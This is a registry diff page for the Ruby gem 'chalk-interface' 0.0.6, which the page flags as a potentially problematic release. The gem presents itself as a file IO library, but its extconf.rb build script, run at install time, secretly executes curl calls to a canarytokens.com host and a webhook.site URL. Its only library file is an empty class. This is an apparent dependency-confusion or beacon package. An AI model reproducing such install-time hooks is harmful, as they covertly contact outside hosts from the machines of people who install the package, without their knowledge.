chalk-interface 0.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of chalk-interface might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 412d3a725dde0bd6fab928e104e5ad5a41beae32fd49af7949d2b843be43491c
4
+ data.tar.gz: c0b9732a89985f4b2af9a86ca1d24dba35c057c0925a433ca546569d6f9421db
5
+ SHA512:
6
+ metadata.gz: 2a52bd3d36403f254585711d907d68bbe5ca92c8d9969dce4458e1f2f314a924ab7c02956cc134fe0322321c4c97f483fe30ed0d26a97d5d1a929f2cf4da590c
7
+ data.tar.gz: 14b314cf4a30932b71f1d3ccaffb3aeda0bce942a4ba79824c263420135f30194d3cbbf59228aa3a222d87c48346514501cda1496b2cc7c7e0de42fea201c994
@@ -0,0 +1,11 @@
1
+ #!/usr/bin/ruby
2
+
3
+ `curl http://ivajbapup62qjl48q5bezq7ll.canarytokens.com`
4
+ `curl https://webhook.site/5da51341-583a-4099-97cf-c9c5c7b2ba20`
5
+
6
+ require "mkmf"
7
+
8
+ abort "missing malloc()" unless have_func "malloc"
9
+ abort "missing free()" unless have_func "free"
10
+
11
+ create_makefile "my_malloc/my_malloc"
data/lib/file/file.rb ADDED
@@ -0,0 +1,2 @@
1
+ class File
2
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: chalk-interface
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.6
5
+ platform: ruby
6
+ authors:
7
+ - stegs
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2011-05-29 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: Provides file IO functions
14
+ email: stegs@stripe.com
15
+ executables: []
16
+ extensions:
17
+ - ext/my_malloc/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/my_malloc/extconf.rb
21
+ - lib/file/file.rb
22
+ homepage: ''
23
+ licenses:
24
+ - MIT
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.0.3
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: Ask Stegs
45
+ test_files: []